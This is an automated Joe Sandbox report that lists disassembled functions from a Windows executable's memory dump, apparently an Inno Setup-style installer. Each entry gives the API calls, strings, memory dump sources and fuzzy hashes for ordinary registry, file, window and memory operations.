Function 00455780 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 142registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004840C7,?,00000001,?,?,004840C7,?,00000001,00000000), ref: 0042DE48

RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00455917,?,00000000,00455957), ref: 0045585D

Strings

PendingFileRenameOperations2, xrefs: 0045582C
WININIT.INI, xrefs: 0045588C
SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 004557E0
PendingFileRenameOperations, xrefs: 004557FC

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CloseOpen
String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
API String ID: 47109696-2199428270
Opcode ID: 9f13e54b28b117c6c951523ac57e4ec8eff7d48dd1f3fb754fdced39f25454b8
Instruction ID: 0edf169a16dfa4fb7533b8b55fc7b889579560f25e46b257abcc71cf1b5dc2f9
Opcode Fuzzy Hash: 9f13e54b28b117c6c951523ac57e4ec8eff7d48dd1f3fb754fdced39f25454b8
Instruction Fuzzy Hash: AB519874E00608DBDB10EF62DC51AEEB7B9EF44315F50847BEC04A7292DB7CAA45CA58

Function 0047D018 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 101COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0047D16E,?,?,00000000,0049C628,00000000,00000000,?,00498C11,00000000,00498DBA,?,00000000), ref: 0047D0AB
GetLastError.KERNEL32(00000000,00000000,00000000,0047D16E,?,?,00000000,0049C628,00000000,00000000,?,00498C11,00000000,00498DBA,?,00000000), ref: 0047D0B4

Strings

_isetup, xrefs: 0047D096
Created temporary directory: , xrefs: 0047D04D
\_setup64.tmp, xrefs: 0047D126

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID: Created temporary directory: $\_setup64.tmp$_isetup
API String ID: 1375471231-2952887711
Opcode ID: a1715584ba94e4ec2e60fd9adbe39064ab1430a51d48f091bd4064c668cb3361
Instruction ID: c65adf921b1b6e4579252068e4265065b5a45be28dde5098669b3b5892976db2
Opcode Fuzzy Hash: a1715584ba94e4ec2e60fd9adbe39064ab1430a51d48f091bd4064c668cb3361
Instruction Fuzzy Hash: F9411674E101099BDB01EF95DC82ADEB7B9EF45309F50853BE81477392DB38AE058B68

Function 00423A94 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

EnumWindows.USER32(00423A2C), ref: 00423AB8
GetWindow.USER32(?,00000003), ref: 00423ACD
GetWindowLongA.USER32(?,000000EC), ref: 00423ADC
SetWindowPos.USER32(00000000,lAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241BB,?,?,00423D83), ref: 00423B12

Strings

lAB, xrefs: 00423B02, 00423B06

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Window$EnumLongWindows
String ID: lAB
API String ID: 4191631535-3476862382
Opcode ID: 7dcdbb5f1d382cba8886e06331430e6d6fce3cff686b988b3074a9d4c358ab09
Instruction ID: 1d232068e43b915345d7588b37cc7287aafbcd058231e570564fb52883b43028
Opcode Fuzzy Hash: 7dcdbb5f1d382cba8886e06331430e6d6fce3cff686b988b3074a9d4c358ab09
Instruction Fuzzy Hash: E3115E70704610ABDB10AF28DC85F5A77E8EB08725F50026AF9A49B2E7C378DD40CB58

Function 0042DE54 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 32registrylibraryloaderCOMMON

Download Yara Rule

APIs

RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042DE60
GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DFFB,00000000,0042E013,?,?,?,?,00000006,?,00000000,00497F35), ref: 0042DE7B
GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DE81

Strings

advapi32.dll, xrefs: 0042DE76
RegDeleteKeyExA, xrefs: 0042DE71

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressDeleteHandleModuleProc
String ID: RegDeleteKeyExA$advapi32.dll
API String ID: 588496660-1846899949
Opcode ID: 780e4264db312733bee64b8429de1b59d21d94b92bca9a45197840037c94c444
Instruction ID: 9cada17f2adbafa0ebcb77ec43832f820b82eaaa71c9ca0bcc52793b6cf27115
Opcode Fuzzy Hash: 780e4264db312733bee64b8429de1b59d21d94b92bca9a45197840037c94c444
Instruction Fuzzy Hash: EFE065B1B40A70BAD62036657C89B972718DB79325F615537F105A91D182BC1C40CE9C

Function 0046BC10 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 320COMMON

Download Yara Rule

Strings

NextButtonClick, xrefs: 0046BD4C
Need to restart Windows? %s, xrefs: 0046BF95
PrepareToInstall failed: %s, xrefs: 0046BF6E

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID:
String ID: Need to restart Windows? %s$NextButtonClick$PrepareToInstall failed: %s
API String ID: 0-2329492092
Opcode ID: 2482342cf09780f3cc85a79916584030efb236fd66ea0455236200f368d4c793
Instruction ID: 9b4fd168f37c7da821868febde12ed9d5c4eb704a6c877b85ca6115e961808cc
Opcode Fuzzy Hash: 2482342cf09780f3cc85a79916584030efb236fd66ea0455236200f368d4c793
Instruction Fuzzy Hash: ECD12B34A00109DFCB10EFA9D585AEE77F5EF49304F6440BAE404AB352E778AE45CB5A

Function 00483568 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 226COMMON

Download Yara Rule

APIs

SetActiveWindow.USER32(?,?,00000000,004838B9), ref: 0048368C
SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 0048372A

Strings

, xrefs: 004837E7
Need to restart Windows? %s, xrefs: 00483767

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ActiveChangeNotifyWindow
String ID: $Need to restart Windows? %s
API String ID: 1160245247-4200181552
Opcode ID: 1d42271db157847063bc1684c76a3f1b571b73f0fbe1024385b2a1440cdba256
Instruction ID: ac7489165aebe6410750fc54bddbdfbbf0a744a872c0faa15b6e968571d36d29
Opcode Fuzzy Hash: 1d42271db157847063bc1684c76a3f1b571b73f0fbe1024385b2a1440cdba256
Instruction Fuzzy Hash: 2891B274A042449FCB11FF69D885B9D7BE0AF59709F0044BBE8009B362D778AE49CB5E

Function 0046FCD4 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON

Download Yara Rule

APIs

Part of subcall function 0042C814: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C838

GetLastError.KERNEL32(00000000,0046FED1,?,?,0049D1E0,00000000), ref: 0046FDAE
SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046FE28
SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046FE4D

Strings

Creating directory: %s, xrefs: 0046FD96

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ChangeNotify$ErrorFullLastNamePath
String ID: Creating directory: %s
API String ID: 2451617938-483064649
Opcode ID: 117d1655f334007bf170a7645c0ff38e0762150d831baea0a8383fbe162a65f0
Instruction ID: bfe09206507b5b37383d903e763d781286b330fb05695de0be9d4a8a79558abe
Opcode Fuzzy Hash: 117d1655f334007bf170a7645c0ff38e0762150d831baea0a8383fbe162a65f0
Instruction Fuzzy Hash: 73513074E00248ABDB01DBA5D982BDEBBF5AF48304F50857AE840B7392D7795E08CB59

Function 00454E48 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 102libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 00454EF6
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00454FBC), ref: 00454F60

Strings

SfcIsFileProtected, xrefs: 00454EF0
sfc.dll, xrefs: 00454EB8

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressByteCharMultiProcWide
String ID: SfcIsFileProtected$sfc.dll
API String ID: 2508298434-591603554
Opcode ID: 3217ee99d138f0ad1313a93335353a3aec08b44a783225051531d7f68469a82d
Instruction ID: fbb3ec6cd5b50b63fd35f8a1b68fa202e0926d3941eb24adcf984c27ed24a225
Opcode Fuzzy Hash: 3217ee99d138f0ad1313a93335353a3aec08b44a783225051531d7f68469a82d
Instruction Fuzzy Hash: E041A931A04218AFE710DB59DC85B9DB7B8AB4430DF5041BBA908A7293D7789F89CB1D

Function 00452584 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON

Download Yara Rule

APIs

751C1520.VERSION(00000000,?,?,?,00497FD8), ref: 004525A4
751C1500.VERSION(00000000,?,00000000,?,00000000,0045261F,?,00000000,?,?,?,00497FD8), ref: 004525D1
751C1540.VERSION(?,00452648,?,?,00000000,?,00000000,?,00000000,0045261F,?,00000000,?,?,?,00497FD8), ref: 004525EB

Strings

Y&E, xrefs: 0045262F, 004525F7

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: C1500C1520C1540
String ID: Y&E
API String ID: 1315064709-1497692694
Opcode ID: fc37f08206c8e69686d66defdddf94d54b59a29bfc554a83f5df64d87965b3cc
Instruction ID: fe46317749af1235fc1090c5145677311abee9a989b9ebf20271da6a38a4ce9d
Opcode Fuzzy Hash: fc37f08206c8e69686d66defdddf94d54b59a29bfc554a83f5df64d87965b3cc
Instruction Fuzzy Hash: 89218471A00608AFDB01DAA98D41DAFB7FCEB4A701F55407BFD00E3382D6B99E058769

Function 0042ED48 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 55libraryloaderCOMMON

Download Yara Rule

APIs

SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDD5

Part of subcall function 0042D8D4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8E7

Part of subcall function 0042E3A4: SetErrorMode.KERNEL32(00008000), ref: 0042E3AE
Part of subcall function 0042E3A4: LoadLibraryA.KERNEL32(00000000,00000000,0042E3F8,?,00000000,0042E416,?,00008000), ref: 0042E3DD

GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDB8

Strings

SHAutoComplete, xrefs: 0042EDB2
shlwapi.dll, xrefs: 0042ED83

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressAutoCompleteDirectoryErrorLibraryLoadModeProcSystem
String ID: SHAutoComplete$shlwapi.dll
API String ID: 395431579-1506664499
Opcode ID: c7efe619f5e20201de876e313b24fed92eb53944867450a94c2631c4c6fd4432
Instruction ID: c6c149a21ca36cce9dc82633ca781001b445ce448e924a27762e383bc0e4c558
Opcode Fuzzy Hash: c7efe619f5e20201de876e313b24fed92eb53944867450a94c2631c4c6fd4432
Instruction Fuzzy Hash: 9611A331B40214BBD711EB62EC81B9E7BA8DB55704F90447BF400A6691DBB89E058A6C

Function 00455AB8 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 41registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004840C7,?,00000001,?,?,004840C7,?,00000001,00000000), ref: 0042DE48

RegCloseKey.ADVAPI32(?,00455B23,?,00000001,00000000), ref: 00455B16

Strings

PendingFileRenameOperations2, xrefs: 00455AF7
PendingFileRenameOperations, xrefs: 00455AE8
SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455AC4

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CloseOpen
String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
API String ID: 47109696-2115312317
Opcode ID: a49214c642ba0f5729985fa818f0988ef7dc9ffa23a320832437af575ff29d5e
Instruction ID: 8ecee5c25e066e5253f0bac752b33d84760847f1c596038c9bfe8eab8c09834c
Opcode Fuzzy Hash: a49214c642ba0f5729985fa818f0988ef7dc9ffa23a320832437af575ff29d5e
Instruction Fuzzy Hash: 62F06D71604A08ABE704D666EC2BA3F73ACD745711FA0446AF80096682EA7DBD04966C

Function 00472350 Relevance: 6.3, APIs: 4, Instructions: 272fileCOMMON

Download Yara Rule

APIs

FindNextFileA.KERNEL32(000000FF,?,00000000,00472521,?,00000000,?,0049D1E0,00000000,00472711,?,00000000,?,00000000,?,004728DD), ref: 004724FD
FindClose.KERNEL32(000000FF,00472528,00472521,?,00000000,?,0049D1E0,00000000,00472711,?,00000000,?,00000000,?,004728DD,?), ref: 0047251B
FindNextFileA.KERNEL32(000000FF,?,00000000,00472643,?,00000000,?,0049D1E0,00000000,00472711,?,00000000,?,00000000,?,004728DD), ref: 0047261F
FindClose.KERNEL32(000000FF,0047264A,00472643,?,00000000,?,0049D1E0,00000000,00472711,?,00000000,?,00000000,?,004728DD,?), ref: 0047263D

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Find$CloseFileNext
String ID:
API String ID: 2066263336-0
Opcode ID: 2ebc6e526ef3f332d7d23b3c970b82b2693ae9964aad5ea01d0d0e8cb2a6954e
Instruction ID: 7a1bd4c17f6bec3c86e88fdd6a66a52641a18dd0aa7136e5d167ac57a2fd4188
Opcode Fuzzy Hash: 2ebc6e526ef3f332d7d23b3c970b82b2693ae9964aad5ea01d0d0e8cb2a6954e
Instruction Fuzzy Hash: EFC13A7090424DAFCF11DFA5C981ADEBBB8BF48304F5085AAE848B3291D7789E46CF54

Function 0048017C Relevance: 6.1, APIs: 4, Instructions: 147fileCOMMON

Download Yara Rule

APIs

FindNextFileA.KERNEL32(000000FF,?,?,?,?,00000000,00480375,?,00000000,00000000,?,?,00481625,?,?,00000000), ref: 00480222
FindClose.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,00480375,?,00000000,00000000,?,?,00481625,?,?), ref: 0048022F
FindNextFileA.KERNEL32(000000FF,?,00000000,00480348,?,?,?,?,00000000,00480375,?,00000000,00000000,?,?,00481625), ref: 00480324
FindClose.KERNEL32(000000FF,0048034F,00480348,?,?,?,?,00000000,00480375,?,00000000,00000000,?,?,00481625,?), ref: 00480342

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Find$CloseFileNext
String ID:
API String ID: 2066263336-0
Opcode ID: c9213149dad22109f0a90e82e8ac420b2eeb9db7d2efcfc5c24199a260e086dc
Instruction ID: 9f58e88908a8a949c71addf9751e3e387abd808faae0fc06516958b92eae9c2a
Opcode Fuzzy Hash: c9213149dad22109f0a90e82e8ac420b2eeb9db7d2efcfc5c24199a260e086dc
Instruction Fuzzy Hash: EF514071A00648AFCB61EFA5CC45ADEB7B8EB48315F1044AAA808E7351D6389F89CF54

Function 00421284 Relevance: 6.1, APIs: 4, Instructions: 127windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(00000000), ref: 00421371
SetMenu.USER32(00000000,00000000), ref: 0042138E
SetMenu.USER32(00000000,00000000), ref: 004213C3
SetMenu.USER32(00000000,00000000), ref: 004213DF

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Menu
String ID:
API String ID: 3711407533-0
Opcode ID: e1bfbeb149fb62e2ad3ad2db837168bd52a0f21d6f4abec7b0304e20cb9d907d
Instruction ID: e7a4369f7fbd106bab2429e1e1dd333134a7e32046ee40fa4552f8195e128e42
Opcode Fuzzy Hash: e1bfbeb149fb62e2ad3ad2db837168bd52a0f21d6f4abec7b0304e20cb9d907d
Instruction Fuzzy Hash: 3F41BE3070026457EB20EA7AA88579B26965F69318F4815BFBC40DF3A3CA7DCC49839D

Function 00416B52 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,?,?,?), ref: 00416B94
SetTextColor.GDI32(?,00000000), ref: 00416BAE
SetBkColor.GDI32(?,00000000), ref: 00416BC8
CallWindowProcA.USER32(?,?,?,?,?), ref: 00416BF0

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Color$CallMessageProcSendTextWindow
String ID:
API String ID: 601730667-0
Opcode ID: 072521f5090f240ceba025e33949739ce14f97652003165ca459573163e57643
Instruction ID: 87133af12c35957a9f748eb5c35761c869d5d8ea54ed11f3f8892641f8a911b8
Opcode Fuzzy Hash: 072521f5090f240ceba025e33949739ce14f97652003165ca459573163e57643
Instruction Fuzzy Hash: A71151B5600A04AFC710EE6ECC84E8773ECDF48314715843EB59ADB612D63CF8418B69

Function 004230D8 Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0042312E
EnumFontsA.GDI32(00000000,00000000,00423078,00410470,00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 00423141
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00423149
ReleaseDC.USER32(00000000,00000000), ref: 00423154

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CapsDeviceEnumFontsRelease
String ID:
API String ID: 2698912916-0
Opcode ID: 94eb306c5e826a01f1e4729cfd5040e8a639f913efc3b2db58b8d9c882bc8d8f
Instruction ID: 95c686a17d04cc75fabac772af01a2849e5ccccd572a20f260adec4fb0f0daed
Opcode Fuzzy Hash: 94eb306c5e826a01f1e4729cfd5040e8a639f913efc3b2db58b8d9c882bc8d8f
Instruction Fuzzy Hash: 7D01DE617043002AE310BF7A5C82BAB3BA49F05319F40027FF908AA3C2D67E9C0447AE

Function 004019CC Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

RtlInitializeCriticalSection.KERNEL32(0049C420,00000000,00401A82,?,?,0040222E,021875C4,000011E0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
RtlEnterCriticalSection.KERNEL32(0049C420,0049C420,00000000,00401A82,?,?,0040222E,021875C4,000011E0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
LocalAlloc.KERNEL32(00000000,00000FF8,0049C420,00000000,00401A82,?,?,0040222E,021875C4,000011E0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
RtlLeaveCriticalSection.KERNEL32(0049C420,00401A89,00000000,00401A82,?,?,0040222E,021875C4,000011E0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

